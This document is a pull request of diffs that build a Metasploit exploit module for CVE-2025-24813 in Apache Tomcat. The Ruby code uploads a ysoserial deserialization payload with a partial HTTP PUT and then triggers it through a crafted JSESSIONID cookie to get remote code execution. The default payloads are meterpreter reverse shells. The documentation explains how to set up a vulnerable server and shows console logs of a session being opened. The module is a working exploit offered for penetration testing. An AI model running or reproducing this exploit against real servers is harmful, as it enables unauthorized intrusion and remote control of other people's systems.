### PR TITLE
Module for CVE-2025-24813

### DIFF
--- a/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
+++ b/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
@@ -117,21 +117,34 @@ msf6 > use multi/http/tomcat_partial_put_deserialization
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
 rport => 8080
-msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 192.168.178.93
-rhost => 192.168.178.93
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
+rhost => 172.16.199.130
 msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
 gadget => CommonsCollections6
 msf6 exploit(multi/http/tomcat_partial_put_deserialization) > check
-[+] 192.168.178.93:8080 - The target is vulnerable.
+[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
+[+] 172.16.199.130:8080 - The target is vulnerable.
 msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
-[*] Started reverse TCP handler on 192.168.178.103:4444 
+[*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable.
 [*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
 [*] Utilizing CommonsCollections6 deserialization chain
-[*] Uploaded ysoserial payload (qnuBmIxezf.session) via partial PUT
+[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
 [*] Attempting to deserialize session file..
 [+] 500 error response usually indicates success :)
-[*] Sending stage (24772 bytes) to 192.168.178.93
-[*] Meterpreter session 1 opened (192.168.178.103:4444 -> 192.168.178.93:40696) at 2025-04-02 09:59:48 +0100
+[*] Sending stage (24772 bytes) to 172.16.199.130
+[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
+[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
+[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700
+
+meterpreter > getuid
+Server username: msfuser
+meterpreter > sysinfo
+Computer        : msfserver
+OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
+++ b/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
@@ -80,7 +80,7 @@ mkdir -p webapps/ROOT/WEB-INF/lib
 cd ./webapps/ROOT/WEB-INF/lib
 ```
 
-Download the following dependancies:
+Download the following dependencies:
 ```
 wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
 wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar

--- a/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
+++ b/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
@@ -1,8 +1,8 @@
 ## Vulnerable Application
 This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality
-that can be exploited with a partial PUT to place an attacker controlled deserialization payload in the work directory.
-For the exploit to succeed, writes must be enabled for the default servlet, and `org.apache.catalina.session.PersistentManager` must be
-configured to use `org.apache.catalina.session.FileStore`.
+that can be exploited with a partial HTTP PUT request to place an attacker controlled deserialization payload in the
+<tomcat_root_dir>/webapps/ROOT/ directory. For the exploit to succeed, writes must be enabled for the default servlet,
+and `org.apache.catalina.session.PersistentManager` must be configured to use `org.apache.catalina.session.FileStore`.
 
 ## Setup
 Download Ubuntu Server 24:

--- a/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
+++ b/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
@@ -1,0 +1,46 @@
+## Vulnerable Application
+This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality 
+that can be exploited with a partial PUT to place an attacker controlled deserialization payload in the work directory. 
+For the exploit to succeed, writes must be enabled for the default servlet, and `org.apache.catalina.session.PersistentManager` must be 
+configured to use `org.apache.catalina.session.FileStore`.
+
+## Testing
+Set up a vulnerable Tomcat instance using https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md#establishing-a-vulnerable-tomcat-configuration
+
+## Verification Steps
+1. Start msfconsole
+2. `use multi/http/tomcat_partial_put_deserialization`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set GADGET <YSOSERIAL_GADGET>`
+6. `set LHOST eth0`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Linux Command
+
+```
+msf6 > use multi/http/tomcat_partial_put_deserialization
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 192.168.178.93
+rhost => 192.168.178.93
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
+gadget => CommonsCollections6
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > check
+[+] 192.168.178.93:8080 - The target is vulnerable.
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
+[*] Started reverse TCP handler on 192.168.178.103:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Utilizing CommonsCollections6 deserialization chain
+[*] Uploaded ysoserial payload (qnuBmIxezf.session) via partial PUT
+[*] Attempting to deserialize session file..
+[+] 500 error response usually indicates success :)
+[*] Sending stage (24772 bytes) to 192.168.178.93
+[*] Meterpreter session 1 opened (192.168.178.103:4444 -> 192.168.178.93:40696) at 2025-04-02 09:59:48 +0100
+```

--- a/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
+++ b/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
@@ -110,7 +110,7 @@ The desired ysoserial gadget to use to obtain RCE.
 
 ## Scenarios
 
-### Apache Tomcat 9.0.99, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command
+### Apache Tomcat 9.0.90, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command
 
 ```
 msf6 > use multi/http/tomcat_partial_put_deserialization

--- a/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
+++ b/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
@@ -1,11 +1,102 @@
 ## Vulnerable Application
-This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality 
-that can be exploited with a partial PUT to place an attacker controlled deserialization payload in the work directory. 
-For the exploit to succeed, writes must be enabled for the default servlet, and `org.apache.catalina.session.PersistentManager` must be 
+This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality
+that can be exploited with a partial PUT to place an attacker controlled deserialization payload in the work directory.
+For the exploit to succeed, writes must be enabled for the default servlet, and `org.apache.catalina.session.PersistentManager` must be
 configured to use `org.apache.catalina.session.FileStore`.
 
-## Testing
-Set up a vulnerable Tomcat instance using https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md#establishing-a-vulnerable-tomcat-configuration
+## Setup
+Download Ubuntu Server 24:
+`wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso`
+
+Install ubuntu on your preferred hypervisor, enable SSH during installation. Reboot once installation is complete and SSH into the target.
+Download Tomcat and Java:
+```
+wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
+wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
+```
+
+Extract the JDK Archive to the appropriate directory:
+```
+tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
+sudo mkdir -p /opt/java
+sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8
+```
+
+Install `unzip` and extract Tomcat:
+```
+sudo apt install unzip -y
+sudo unzip apache-tomcat-9.0.90.zip -d /opt/
+```
+
+Set `CATALINA_HOME` and `JAVA_HOME` also update `PATH` by adding the following to `~/.bashrc`:
+```
+export CATALINA_HOME=/opt/apache-tomcat-9.0.90
+export JAVA_HOME=/opt/java/zulu8
+export PATH=$JAVA_HOME/bin:$PATH
+```
+
+Apply changes:
+```
+source ~/.bashrc
+```
+
+Change Tomcat permissions:
+```
+sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
+sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin
+```
+
+Edit `conf/web.xml` and update the default servlet with the following:
+```
+    <servlet>
+        <servlet-name>default</servlet-name>
+        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
+        <init-param>
+            <param-name>debug</param-name>
+            <param-value>0</param-value>
+        </init-param>
+        <init-param>
+            <param-name>listings</param-name>
+            <param-value>false</param-value>
+        </init-param>
+        <init-param>
+          <param-name>readonly</param-name>
+          <param-value>false</param-value>
+        </init-param>
+        <load-on-startup>1</load-on-startup>
+    </servlet>
+```
+
+Edit `conf/content.xml` and add the following inside the pre-existing `<Context>` tags:
+```
+    <Manager className="org.apache.catalina.session.PersistentManager">
+      <Store className="org.apache.catalina.session.FileStore" />
+    </Manager>
+```
+
+Create the following directory inside the tomcat root directory:
+```
+mkdir -p webapps/ROOT/WEB-INF/lib
+cd ./webapps/ROOT/WEB-INF/lib
+```
+
+Download the following dependancies:
+```
+wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
+wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
+wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
+```
+
+Start the vulnerable Tomcat instance:
+```
+cd /opt/apache-tomcat-9.0.90/bin
+./startup.sh
+```
+
+## Options
+
+### GADGET
+The desired ysoserial gadget to use to obtain RCE.
 
 ## Verification Steps
 1. Start msfconsole
@@ -19,7 +110,7 @@ Set up a vulnerable Tomcat instance using https://github.com/PaloAltoNetworks/Un
 
 ## Scenarios
 
-### Linux Command
+### Apache Tomcat 9.0.99, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command
 
 ```
 msf6 > use multi/http/tomcat_partial_put_deserialization

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -95,11 +95,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     trigger_res = trigger_payload(upload_session_id)
-    if trigger_res&.code == 500
-      Exploit::CheckCode::Vulnerable
-    else
+    if trigger_res&.code != 500
       Exploit::CheckCode::Safe
     end
+
+    Exploit::CheckCode::Vulnerable
   end
 
   def exploit
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
     end
 
-    print_status("Uploaded ysoserial payload (#{upload_session_id}.session) via partial PUT")
+    print_good("Uploaded ysoserial payload (#{upload_session_id}.session) via partial PUT")
     print_status('Attempting to deserialize session file..')
 
     trigger_payload_res = trigger_payload(upload_session_id)

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -145,7 +145,12 @@ class MetasploitModule < Msf::Exploit::Remote
       "#{session_id}.session"
     )
 
-    register_file_for_cleanup("../webapps/ROOT/#{session_id}.session")
+    case target['Platform']
+    when ['unix', 'linux']
+      register_file_for_cleanup("../webapps/ROOT/#{session_id}.session")
+    when 'win'
+      register_file_for_cleanup("..\\webapps\\ROOT\\#{session_id}.session}")
+    end
     # 201/204 is the normal success code
     # 409 indicates a conflict or file permission issue
     # but the partial file will still be created

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2025-03-10', # Vendor release note
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux', 'win'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_CMD],
         'Privileged' => false,
         'Targets' => [
           [
@@ -53,18 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
           [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :linux_dropper,
-              'DefaultOptions' => {
-                'CMDSTAGER::FLAVOR' => :curl,
-                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
-              }
-            }
-          ],
-          [
             'Windows Command',
             {
               'Platform' => 'win',
@@ -73,19 +61,10 @@ class MetasploitModule < Msf::Exploit::Remote
               'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
             }
           ],
-          [
-            'Windows Dropper',
-            {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :windows_dropper,
-              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
-            }
-          ],
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'SSL' => true
+          'SSL' => false
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -103,18 +82,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # TODO
+    return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
   end
 
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-
-    case target['Type']
-    when :unix_cmd, :windows_cmd
-      execute_command(payload.encoded)
-    when :linux_dropper, :windows_dropper
-      execute_cmdstager
-    end
+    execute_command(payload.encoded)
   end
 
   def execute_command(cmd, _opts = {})
@@ -128,16 +101,18 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
-    vprint_status("Utilizing #{datastore['GADGET']} deserialization chain")
     session_id = Rex::Text.rand_text_alpha(10)
     session_file = "#{session_id}.session"
-    vprint_status("Uploading ysoserial payload (#{session_file}) via partial PUT")
+
+    print_status("Utilizing #{datastore['GADGET']} deserialization chain")
+    print_status("Uploading ysoserial payload (#{session_file}) via partial PUT")
     res = send_partial_put(
       generate_java_deserialization_for_command(datastore['GADGET'].to_s, shell, cmd),
       session_file
     )
 
-    unless res && res.code == 200
+    upload_success_codes = [200, 409]
+    unless res && upload_success_codes.include?(res.code)
       fail_with(Failure::UnexpectedReply, "Failed to upload payload: #{res.code}")
     end
 
@@ -145,24 +120,22 @@ class MetasploitModule < Msf::Exploit::Remote
     request = {
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
-      'headers' => { 'Cookie' => "JSESSIONID=.#{session_id}" },
-      'data' => data
+      'headers' => { 'Cookie' => "JSESSIONID=.#{session_id}" }
     }
 
+    print_status("Attempting to deserialize session file: #{session_id}")
     res = send_request_cgi(request)
-
-    unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "Failed to restore session: #{res.code}")
+    unless res && res.code == 500
+      fail_with(Failure::UnexpectedReply, "Failed to deserialize session: #{res.code}")
     end
 
-    print_good("Successfully executed command: #{cmd}")
+    print_good('500 error response usually indicates success :)')
   end
 
   def send_partial_put(data, name)
     request = {
       'method' => 'PUT',
       'uri' => normalize_uri(target_uri.path, name),
-      'ctype' => 'application/octet-stream',
       'headers' => { 'Content-Range' => 'bytes 0-5/100' },
       'data' => data
     }

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -82,20 +82,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # Basic check to identify write enabled servers.
-    # Try to DELETE a random nonexistent file
-    # (Can only confirm that write ops are enabled,
-    # not that the PersistentManager is configured to
-    # use FileStore)
-    request = {
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha(10))
-    }
-    res = send_request_cgi(request)
-    if res && res.code != 405
-      return Exploit::CheckCode::Appears
-    else
+    # Advanced check, runs the full exploit (without a command)
+    # Assumes a 500 response from requesting the session indicates success
+    upload_session_id = upload_payload('')
+    unless upload_session_id
       return Exploit::CheckCode::Safe
+    end
+
+    trigger_res = trigger_payload(upload_session_id)
+    if trigger_res && trigger_res.code == 500
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
     end
   end
 
@@ -105,6 +103,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
+    print_status("Utilizing #{datastore['GADGET']} deserialization chain")
+
+    upload_session_id = upload_payload(cmd)
+    unless upload_session_id
+      fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
+    end
+
+    print_status("Uploaded ysoserial payload (#{upload_session_id}.session) via partial PUT")
+    print_status('Attempting to deserialize session file..')
+
+    trigger_payload_res = trigger_payload(upload_session_id)
+    unless trigger_payload_res && trigger_payload_res.code == 500
+      fail_with(Failure::UnexpectedReply, "Failed to deserialize session: #{trigger_payload_res.code}")
+    end
+
+    print_good('500 error response usually indicates success :)')
+  end
+
+  def upload_payload(cmd)
     # Determine the shell
     case target['Platform']
     when 'unix', 'linux'
@@ -115,35 +132,29 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
+    # Generate a random session id
     session_id = Rex::Text.rand_text_alpha(10)
-    session_file = "#{session_id}.session"
-
-    print_status("Utilizing #{datastore['GADGET']} deserialization chain")
-    print_status("Uploading ysoserial payload (#{session_file}) via partial PUT")
     res = send_partial_put(
       generate_java_deserialization_for_command(datastore['GADGET'].to_s, shell, cmd),
-      session_file
+      "#{session_id}.session"
     )
 
-    upload_success_codes = [201, 409]
-    unless res && upload_success_codes.include?(res.code)
-      fail_with(Failure::UnexpectedReply, "Failed to upload payload: #{res.code}")
+    # 201/204 is the normal success code
+    # 409 indicates a conflict or file permission issue
+    # but the partial file will still be created
+    if res && [201, 204, 409].include?(res.code)
+      session_id
     end
+  end
 
+  def trigger_payload(session_id)
     # Request the session id to retrieve the file and trigger deserialization
     request = {
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path),
       'headers' => { 'Cookie' => "JSESSIONID=.#{session_id}" }
     }
-
-    print_status("Attempting to deserialize session file: #{session_id}")
-    res = send_request_cgi(request)
-    unless res && res.code == 500
-      fail_with(Failure::UnexpectedReply, "Failed to deserialize session: #{res.code}")
-    end
-
-    print_good('500 error response usually indicates success :)')
+    send_request_cgi(request)
   end
 
   def send_partial_put(data, name)

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -1,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::JavaDeserialization
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Tomcat Partial PUT Java Deserialization',
+        'Description' => %q{
+          This module exploits a Java deserialization vulnerability in Apache
+          Tomcats's session restoration functionality that can be exploited with a partial PUT
+          to place an attacker controlled deserialisazion payload in the work directory.
+
+          For the exploit to succeed, writes must be enabled for the default servlet,
+          and org.apache.catalina.session.PersistentManager must be configured to use
+          org.apache.catalina.session.FileStore.
+
+          Verified working on XXX
+        },
+        'Author' => [
+          'sw0rd1ight', # Discovery
+          'Calum Hutton', # Exploit
+        ],
+        'References' => [
+          ['CVE', '2025-24813'],
+          ['URL', 'https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-24813'],
+        ],
+        'DisclosureDate' => '2025-03-10', # Vendor release note
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :curl,
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('GADGET', [true, 'ysoserial gadget', 'CommonsBeanutils1']),
+    ])
+  end
+
+  def check
+    # TODO
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd, :windows_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :windows_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Determine the shell
+    case target['Platform']
+    when 'unix', 'linux'
+      shell = 'bash'
+    when 'win'
+      shell = 'cmd'
+    else
+      fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+
+    vprint_status("Utilizing #{datastore['GADGET']} deserialization chain")
+    session_id = Rex::Text.rand_text_alpha(10)
+    session_file = "#{session_id}.session"
+    vprint_status("Uploading ysoserial payload (#{session_file}) via partial PUT")
+    res = send_partial_put(
+      generate_java_deserialization_for_command(datastore['GADGET'].to_s, shell, cmd),
+      session_file
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to upload payload: #{res.code}")
+    end
+
+    # Request the session id to retrieve the file and trigger deserialization
+    request = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => { 'Cookie' => "JSESSIONID=.#{session_id}" },
+      'data' => data
+    }
+
+    res = send_request_cgi(request)
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to restore session: #{res.code}")
+    end
+
+    print_good("Successfully executed command: #{cmd}")
+  end
+
+  def send_partial_put(data, name)
+    request = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, name),
+      'ctype' => 'application/octet-stream',
+      'headers' => { 'Content-Range' => 'bytes 0-5/100' },
+      'data' => data
+    }
+    send_request_cgi(request)
+  end
+
+end

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::JavaDeserialization
 
   def initialize(info = {})
@@ -26,11 +25,12 @@ class MetasploitModule < Msf::Exploit::Remote
           and org.apache.catalina.session.PersistentManager must be configured to use
           org.apache.catalina.session.FileStore.
 
-          Verified working on XXX
+          Verified working on 10.1.16-1
         },
         'Author' => [
           'sw0rd1ight', # Discovery
-          'Calum Hutton', # Exploit
+          'Calum Hutton', # MSF Module
+          'h4ck3r-04' # MSF Module
         ],
         'References' => [
           ['CVE', '2025-24813'],
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix Command',
             {
-              'Platform' => [ 'unix', 'linux' ],
+              'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd
             }

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def upload_payload(cmd)
     # Generate a random session id
     session_id = Rex::Text.rand_text_alpha(10)
-    # Determine the shell
+    # Determine the shell and register the payload for cleanup
     case target['Platform']
     when ['unix', 'linux']
       shell = 'bash'

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::JavaDeserialization
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -18,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Tomcat Partial PUT Java Deserialization',
         'Description' => %q{
           This module exploits a Java deserialization vulnerability in Apache
-          Tomcat's session restoration functionality that can be exploited with a partial PUT
-          to place an attacker controlled deserialization payload in the work directory.
+          Tomcat's session restoration functionality that can be exploited with a partial HTTP PUT request to
+          place an attacker controlled deserialization payload in the <tomcat_root_dir>/webapps/ROOT/ directory.
 
           For the exploit to succeed, writes must be enabled for the default servlet,
           and org.apache.catalina.session.PersistentManager must be configured to use
@@ -144,6 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
       "#{session_id}.session"
     )
 
+    register_file_for_cleanup("../webapps/ROOT/#{session_id}.session")
     # 201/204 is the normal success code
     # 409 indicates a conflict or file permission issue
     # but the partial file will still be created

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -46,10 +46,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => [ 'unix', 'linux' ],
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' }
+              'Type' => :unix_cmd
             }
           ],
           [
@@ -57,14 +56,14 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
-              'Type' => :windows_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+              'Type' => :windows_cmd
             }
           ],
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'SSL' => false
+          'SSL' => false,
+          'RPORT' => 443
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -75,7 +74,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(8080),
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('GADGET', [true, 'ysoserial gadget', 'CommonsBeanutils1']),
     ])
@@ -114,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to deserialize session file..')
 
     trigger_payload_res = trigger_payload(upload_session_id)
-    unless trigger_payload_res && trigger_payload_res.code == 500
+    unless trigger_payload_res&.code == 500
       fail_with(Failure::UnexpectedReply, "Failed to deserialize session: #{trigger_payload_res.code}")
     end
 

--- a/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
+++ b/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb
@@ -48,7 +48,10 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
             }
           ],
           [
@@ -82,9 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     # Advanced check, runs the full exploit (without a command)
     # Assumes a 500 response from requesting the session indicates success
-    upload_session_id = upload_payload('')
-    unless upload_session_id
-      return Exploit::CheckCode::Safe
+    begin
+      upload_session_id = upload_payload('')
+      unless upload_session_id
+        return Exploit::CheckCode::Safe
+      end
+    rescue Msf::Exploit::Failed => e
+      return CheckCode::Safe(e)
     end
 
     trigger_res = trigger_payload(upload_session_id)
@@ -122,12 +129,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def upload_payload(cmd)
     # Determine the shell
     case target['Platform']
-    when 'unix', 'linux'
+    when ['unix', 'linux']
       shell = 'bash'
     when 'win'
       shell = 'cmd'
     else
-      fail_with(Failure::NoTarget, 'Unsupported target platform!')
+      fail_with(Failure::NoTarget, "Unsupported target platform! (#{target['Platform']})")
     end
 
